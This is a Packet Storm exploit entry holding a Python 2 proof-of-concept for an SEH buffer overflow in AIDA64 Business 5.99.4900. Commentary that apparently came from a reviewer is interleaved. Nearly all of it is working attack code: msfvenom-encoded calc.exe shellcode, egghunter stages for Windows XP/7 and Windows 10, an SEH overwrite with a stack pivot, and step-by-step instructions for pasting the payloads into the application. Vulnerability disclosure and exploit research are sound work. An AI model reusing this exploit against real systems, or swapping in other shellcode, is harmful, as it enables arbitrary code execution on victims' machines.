
packetstormPeyman ForouzanPACKETSTORM:152365

AIDA64 Business 5.99.4900 SEH Buffer Overflow

2019-04-0300:00:00
Peyman Forouzan
packetstormsecurity.com
`#!/usr/bin/python #  
# Exploit Title: AIDA64 Business 5.99.4900 - SEH Buffer Overflow (EggHunter) #  
# Date: 2019-04-01 #  
# Vendor Homepage: https://www.aida64.com #  
# Software Link: https://www.aida64.com/downloads #  
# Mirror Link : https://www.softpedia.com/get/System/System-Info/AIDA64-Business-Edition.shtml #  
# Exploit Author: Peyman Forouzan #  
# Tested Version: 5.99.4900 #  
# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #  
# Special Thanks to my wife #  
# The program has an SEH buffer overflow in several places (this code shows one of them). #  
# Note 1 : To optimize code, I've used a "stack pivot" that is the same in #  
# (Extreme, Engineer, Network Audit) Editions. #  
# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4900 #  
# But the stack pivots in Business Edition are different. #  
# Note 2 : All the old versions of the program that are available on the sites like soft32.com, #  
# or in https://www.aida64.com/downloads/archive #  
# have the same vulnerability at different offsets (for example version 5.70.3800). #  
# Note 3 : this technique (EggHunter) has been used so that the exploit works on different Windows versions. #  
# Steps : #  
# 1- Run python code : Aida64-Business.py ( Three files are created ) #  
# 2- App --> File --> Preferences --> Email --> SMTP --> paste in contents from the egg.txt #  
# into "Display name" --> Ok #  
# 3- Report --> Report Wizard ... --> Next --> paste in contents from the egghunter-winxp-win7.txt #  
# or egghunter-win10.txt (depend on your windows version) into "Load from file" --> Next #  
# --> Wait a minute --> Shellcode (Calc) open #  
#---------------------------------------------------------------------------------------------------------#  
  
#------------------------------------ EGG Shellcode Generation ---------------------------------------  
  
# Length of each hunter payload before the SEH pair is appended: the "\x41"
# padding below is sized to (bufsize - len(hunter) - len(jmpback)), so
# hunter + padding + jmpback is exactly bufsize bytes, after which nseh (4 bytes)
# and seh (3 bytes) follow.
# NOTE(review): nothing checks that the hunter actually fits; if
# len(hunter) + len(jmpback) ever exceeded bufsize, the negative repeat count
# would silently produce an empty pad and the payload would grow past bufsize.
bufsize = 292  
  
#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg  
# Second stage ("egg"): an 8-byte tag followed by the msfvenom-generated,
# alphanumeric-encoded calc.exe payload (opaque bytes, not decoded here).
# Per the steps in the header this text ends up in the SMTP "Display name"
# preference, so the literal "w00tw00t" tag stored in that setting is a
# usable indicator when looking for this technique on a host.
egg = "w00tw00t"  
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"  
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"  
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"  
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"  
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"  
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"  
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"  
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"  
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"  
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"  
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"  
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"  
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"  
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"  
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"  
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"  
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"  
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"  
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"  
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"  
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"  
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"  
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"  
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"  
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"  
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"  
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"  
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"  
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"  
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"  
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"  
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"  
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"  
  
# Python 2 script (print-statement syntax below): str values are byte strings,
# so the "\xNN" escapes above are written out as raw bytes.
f = open ("egg.txt", "w")  
f.write(egg)  
f.close()  
  
#---------------------------------- EGG Hunter Shellcode Generation ------------------------------------  
# First stage for Windows XP / 7 (the user picks this file or the Win10 one,
# see the steps in the header): 13 raw bytes, then an alphanumeric-encoded
# hunter body. Presumably the raw prefix is the edition-specific "stack pivot"
# mentioned in Note 1 — not verified here, the bytes are left opaque.
egghunter = "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29\xf7"  
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"  
egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"  
egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"  
egghunter += "\x42\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"  
egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"  
egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"  
egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"  
egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"  
egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"  
egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"  
egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"  
egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"  
egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"  
egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"  
egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"  
egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"  
  
# First-stage variant for Windows 10: the same 13-byte raw prefix as
# egghunter (split across the first two lines here), with a different
# encoded body.
egghunter10 = "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29"  
egghunter10 += "\xf7\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"  
egghunter10 += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"  
egghunter10 += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"  
egghunter10 += "\x41\x42\x75\x4a\x49\x4d\x53\x5a\x4c\x34\x70\x50"  
egghunter10 += "\x31\x69\x42\x30\x52\x70\x52\x30\x52\x62\x46\x4e"  
egghunter10 += "\x6c\x4a\x6b\x6b\x30\x59\x6b\x76\x43\x44\x35\x54"  
egghunter10 += "\x42\x4d\x63\x59\x50\x30\x66\x4b\x31\x59\x5a\x69"  
egghunter10 += "\x6f\x56\x6f\x43\x72\x31\x42\x6b\x30\x39\x6b\x6f"  
egghunter10 += "\x30\x44\x34\x44\x4c\x48\x38\x64\x7a\x39\x6e\x39"  
egghunter10 += "\x6f\x49\x6f\x6c\x37\x4b\x68\x68\x4d\x64\x6e\x72"  
egghunter10 += "\x7a\x58\x6b\x47\x61\x54\x71\x4b\x6b\x76\x33\x31"  
egghunter10 += "\x43\x76\x33\x50\x6a\x45\x79\x46\x38\x78\x33\x39"  
egghunter10 += "\x50\x45\x34\x49\x6f\x46\x73\x4f\x73\x4b\x74\x66"  
egghunter10 += "\x6c\x72\x7a\x65\x6c\x46\x65\x54\x34\x5a\x73\x78"  
egghunter10 += "\x38\x51\x67\x34\x70\x30\x30\x30\x74\x4b\x39\x78"  
egghunter10 += "\x57\x6e\x4f\x42\x55\x48\x4e\x4e\x4f\x74\x35\x5a"  
egghunter10 += "\x6b\x69\x6f\x4b\x57\x41\x41"  
  
# 5-byte relative jump whose displacement 0xfffffedc is -0x124 = -292, i.e.
# -bufsize: taken from the end of the bufsize-byte region it lands on offset 0,
# the start of the hunter (consistent with the author's "jmp back").
jmpback = "\xe9\xdc\xfe\xff\xff" # jmp back  
# 4 bytes, the width of the next-SEH slot: a 2-byte short backward jump
# (displacement 0xf9 = -7) padded with two 0x90 bytes.
nseh = "\xeb\xf9\x90\x90" # jmp Short back  
# Only 3 bytes are emitted for the handler address; presumably the fourth
# (most significant) byte is supplied by the string's terminating NUL — TODO confirm.
seh = "\x50\x15\x40" # Overwrite Seh - Golden Pivot !! - Works on all Editions  
  
# XP / Win7 file: hunter, "A" padding up to bufsize - len(jmpback), jmpback,
# then the nseh/seh pair — 292 + 4 + 3 = 299 bytes when the hunter fits.
# (The name `buffer` shadows the Python 2 builtin of the same name.)
buffer = egghunter  
buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))  
buffer += jmpback  
buffer += nseh  
buffer += seh  
print "[+] Creating %s bytes payload for winxp and windows 7 ..." %len(buffer)  
f = open ("egghunter-winxp-win7.txt", "w")  
# NOTE(review): "File created!" is printed before the write happens, so it
# reports success even if f.write() were to fail.
print "[+] File created!"  
f.write(buffer)  
f.close()  
  
# Win10 file: identical layout, built from egghunter10 instead.
buffer = egghunter10  
buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))  
buffer += jmpback  
buffer += nseh  
buffer += seh  
print "[+] Creating %s bytes payload for windows 10 ..." %len(buffer)  
f = open ("egghunter-win10.txt", "w")  
# NOTE(review): same early success message as above — printed before f.write().
print "[+] File created!"  
f.write(buffer)  
f.close()  
`